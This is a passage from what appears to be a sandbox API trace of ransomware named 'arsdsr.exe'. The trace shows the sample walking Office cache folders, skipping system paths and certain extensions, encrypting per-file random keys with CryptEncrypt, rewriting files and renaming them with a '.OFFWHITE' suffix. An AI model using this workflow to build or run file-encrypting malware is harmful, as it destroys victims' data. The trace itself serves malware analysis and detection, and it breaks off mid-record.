dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0085.816] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=913) returned 1 [0085.816] GetProcessHeap () returned 0x500000 [0085.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0085.817] GetProcessHeap () returned 0x500000 [0085.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0085.817] GetProcessHeap () returned 0x500000 [0085.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0085.817] GetProcessHeap () returned 0x500000 [0085.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0085.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.817] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0085.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.817] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0085.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.817] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0085.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.817] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0085.818] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x391, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.818] SetLastError (dwErrCode=0x0) [0085.818] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.951] GetLastError () returned 0x0 [0085.951] GetLastError () returned 0x0 [0085.951] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x491, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.951] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.951] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x591, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.951] WriteFile (in: hFile=0x21c, lpBuffer=0x547c28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c28*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0085.951] GetProcessHeap () returned 0x500000 [0085.951] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x391) returned 0x53f480 [0085.952] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.952] ReadFile (in: hFile=0x21c, lpBuffer=0x53f480, nNumberOfBytesToRead=0x391, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x391, lpOverlapped=0x0) returned 1 [0085.952] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.952] WriteFile (in: hFile=0x21c, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x391, lpOverlapped=0x0) returned 1 [0085.952] GetProcessHeap () returned 0x500000 [0085.952] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0085.952] CloseHandle (hObject=0x21c) returned 1 [0085.953] GetProcessHeap () returned 0x500000 [0085.953] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0085.953] GetProcessHeap () returned 0x500000 [0085.953] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0085.953] GetProcessHeap () returned 0x500000 [0085.953] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0085.953] GetProcessHeap () returned 0x500000 [0085.953] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0085.953] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" [0085.953] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.OFFWHITE" [0085.953] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.offwhite")) returned 1 [0085.958] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0085.958] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0085.958] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" [0085.958] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" [0085.958] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.958] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.958] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0085.958] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0085.959] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0085.959] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0085.959] GetProcessHeap () returned 0x500000 [0085.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c38 [0085.959] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0085.959] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1452) returned 1 [0085.959] GetProcessHeap () returned 0x500000 [0085.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0085.959] GetProcessHeap () returned 0x500000 [0085.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0085.959] GetProcessHeap () returned 0x500000 [0085.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0085.959] GetProcessHeap () returned 0x500000 [0085.959] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0085.959] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.959] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.959] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0085.959] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.959] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.959] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0085.959] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.959] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.959] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0085.960] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.960] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.960] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0085.960] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.960] SetLastError (dwErrCode=0x0) [0085.960] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.970] GetLastError () returned 0x0 [0085.970] GetLastError () returned 0x0 [0085.970] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.970] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x21c, lpBuffer=0x547c38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c38*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0085.970] GetProcessHeap () returned 0x500000 [0085.970] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5ac) returned 0x546980 [0085.970] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.970] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x5ac, lpOverlapped=0x0) returned 1 [0085.970] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.970] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x5ac, lpOverlapped=0x0) returned 1 [0085.970] GetProcessHeap () returned 0x500000 [0085.970] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0085.970] CloseHandle (hObject=0x21c) returned 1 [0085.971] GetProcessHeap () returned 0x500000 [0085.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0085.971] GetProcessHeap () returned 0x500000 [0085.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0085.971] GetProcessHeap () returned 0x500000 [0085.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0085.971] GetProcessHeap () returned 0x500000 [0085.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0085.971] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" [0085.971] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0085.972] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0085.972] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0085.972] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0085.972] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0085.972] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0085.973] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0085.973] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0115-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C" [0085.973] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0085.973] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0085.973] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0085.973] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0085.989] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.990] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0085.990] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.990] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.990] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="1033", cAlternateFileName="")) returned 1 [0085.990] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="$recycle.bin") returned 1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="rsa") returned -1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="ntuser.dat") returned -1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="programdata") returned -1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="appdata") returned -1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="program files") returned -1 [0085.990] lstrcmpiW (lpString1="1033", lpString2="program files (x86)") returned -1 [0085.990] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0085.990] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="1033" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033" [0085.990] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\" [0085.990] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\" [0085.990] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*" [0085.990] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0085.991] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.992] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0085.992] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.992] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.992] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x860084, 